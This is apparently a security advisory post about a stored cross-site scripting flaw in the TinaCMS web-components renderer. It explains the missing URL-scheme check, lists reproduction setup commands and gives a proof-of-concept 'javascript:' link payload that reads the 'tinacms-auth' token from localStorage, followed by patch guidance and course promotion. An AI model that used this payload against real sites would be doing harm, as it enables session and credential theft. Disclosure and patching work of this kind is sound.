Listen to this Post
The vulnerability resides within the rich-text parsing and rendering mechanism of the TinaCMS web components package.
Specifically, the component processes Abstract Syntax Trees (AST) derived from content input fields.
When encountering anchor nodes (node.type === 'a'), the renderer directly assigns the untrusted `node.url` attribute straight to the anchor element’s `href` property.
Unlike raw HTML node values which are safely filtered through a DOMPurify call prior to DOM insertion, link node URLs completely bypass scheme inspection.
Because there is no validation or allow-list enforcing safe protocols, authors can input arbitrary custom URI schemes.
Injecting a `javascript:` payload creates a live, executable anchor link within the rendered shadow DOM.
When an administrator, editor, or regular site visitor clicks the poisoned link, the browser executes the script in the context of the site’s origin.
This lack of script isolation and URL sanitization turns content-editing capabilities into persistent stored cross-site scripting.
Attackers can leverage this flaw to access sensitive session cookies, local storage credentials, and authentication tokens such as tinacms-auth.
Most other renderers across the TinaCMS codebase correctly utilize the canonical `sanitizeUrl` guard to reject dangerous protocols.
However, the web-components package omitted this critical function, creating an oversight where six out of seven renderers sanitize links while one fails.
Remediation requires importing the dependency-free subpath export and applying scheme validation before property assignment.
DailyCVE Form:
Platform: TinaCMS
Version: Prior to 3.9.3
Vulnerability: Stored XSS
Severity: High
date: June 19, 2026
Prediction: June 19, 2026
(end of form)
What Undercode Say
git clone https://github.com/tinacms/tinacms.git tinacms-poc cd tinacms-poc && git checkout 0d38acfdd23143384b8787d5d772b713fa7af163 REPO=$PWD mkdir -p /tmp/tina-tm/site && cd /tmp/tina-tm npm init -y >/dev/null npm i --ignore-scripts [email protected] [email protected] [email protected] cp "$REPO/packages/@tinacms/web-components/src/tina-markdown.js" ./tina-markdown.js cp "$REPO/packages/@tinacms/mdx/src/sanitize-url.ts" ./sanitize-url.ts
Exploit: (Educational Purposes!)
const ast = {
type: 'root',
children: [
{ type: 'p', children: [
{ type: 'a',
url: "javascript:window.__pwned=document.domain+' | localStorage[tinacms-auth]='+localStorage.getItem('tinacms-auth');void 0",
children: [{ type: 'text', text: 'click me' }] }
]}
]
};
Protection: from this CVE
Upgrade `@tinacms/mdx` to version 2.1.7 or later and `tinacms` to version 3.9.3 or later. Ensure that all untrusted URL properties pass through the canonical `sanitizeUrl` utility to restrict allowed schemes strictly to safe protocols like http, https, mailto, tel, and xref.
Impact
Stored cross-site scripting via unvalidated URL schemes in link attributes allows any content editor to achieve arbitrary JavaScript execution in the browser session of any user or administrator viewing the site, resulting in full credential exposure via `tinacms-auth` and complete origin compromise.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

